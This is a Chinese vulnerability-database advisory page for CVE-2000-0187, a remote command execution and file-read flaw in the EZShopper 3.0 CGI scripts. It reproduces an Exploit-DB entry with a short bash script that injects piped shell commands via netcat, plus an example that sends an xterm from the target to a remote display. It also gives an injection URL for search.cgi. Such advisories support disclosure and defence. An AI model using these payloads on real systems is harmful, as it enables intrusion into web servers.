EZShopper远程命令执行漏洞

EZShopper远程命令执行漏洞

漏洞ID 1105727 漏洞类型 输入验证
发布时间 2000-02-27 更新时间 2005-10-20
图片[1]-EZShopper远程命令执行漏洞-安全小百科CVE编号 CVE-2000-0187
图片[2]-EZShopper远程命令执行漏洞-安全小百科CNNVD-ID CNNVD-200002-076
漏洞平台 Multiple CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19781
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-076
|漏洞详情
EZShopper3.0版本loadpage.cgiCGI脚本存在漏洞。远程攻击者借助..(点点)攻击读取任意文件或借助shell元字符执行命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1014/info

EZShopper is a perl-based E-Commerce software package offered by Alex Heiphetz Group, Inc. It is possible to remotely compromise a host due to a lack of checks on user input passed directly to the open() call. This vulnerability exists in two scripts shipped with EZShopper, loadpage.cgi and search.cgi. 

In the first vulnerability, the variable passed to open() is called "file" and is submitted to a script called loadpage.cgi. There are no checks on "file", meaning that if "../" preceed an arbitrary filename/path as the file variable, those "../" paths will be followed and the arbitrary file anywhere on the filesystem will be displayed (provided that the uid of the webserver has access to them..). If pipes are included in the variable, arbitrary commands can be executed on the target host possibly giving remote access to the attacker with the uid of the webserver (usually 'nobody'). 

The second vulnerability is identical in nature to the first but is in the "search.cgi" script. In search.cgi, no checks are made on user input variables 'template' and 'database' (passed to open()). As a result, it is possible to view files or execute commands on the host through search.cgi as well.

#!/bin/bash 
echo -e "GET http: //www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=|"$1"| HTTP/1.0nn" | nc proxy.server.com 8080

[ /cut ]

$ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%

(this would send an xterm from the target host to wherever display is)

http: //www.example.com/cgi-bin/search.cgi?user_id=1&database=<insert here>&template=<or insert here>&distinct=1
|参考资料

来源:BID
名称:1014
链接:http://www.securityfocus.com/bid/1014
来源:BUGTRAQ
名称:20000227EZShopper3.0shoppingcartCGIremotecommandexecution
链接:http://archives.neohapsis.com/archives/bugtraq/2000-02/0356.html

相关推荐: Multiple Vendor SSH2 Implementation Vulnerabilities

Multiple Vendor SSH2 Implementation Vulnerabilities 漏洞ID 1101172 漏洞类型 Unknown 发布时间 2002-12-16 更新时间 2002-12-16 CVE编号 N/A CNNVD-ID N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享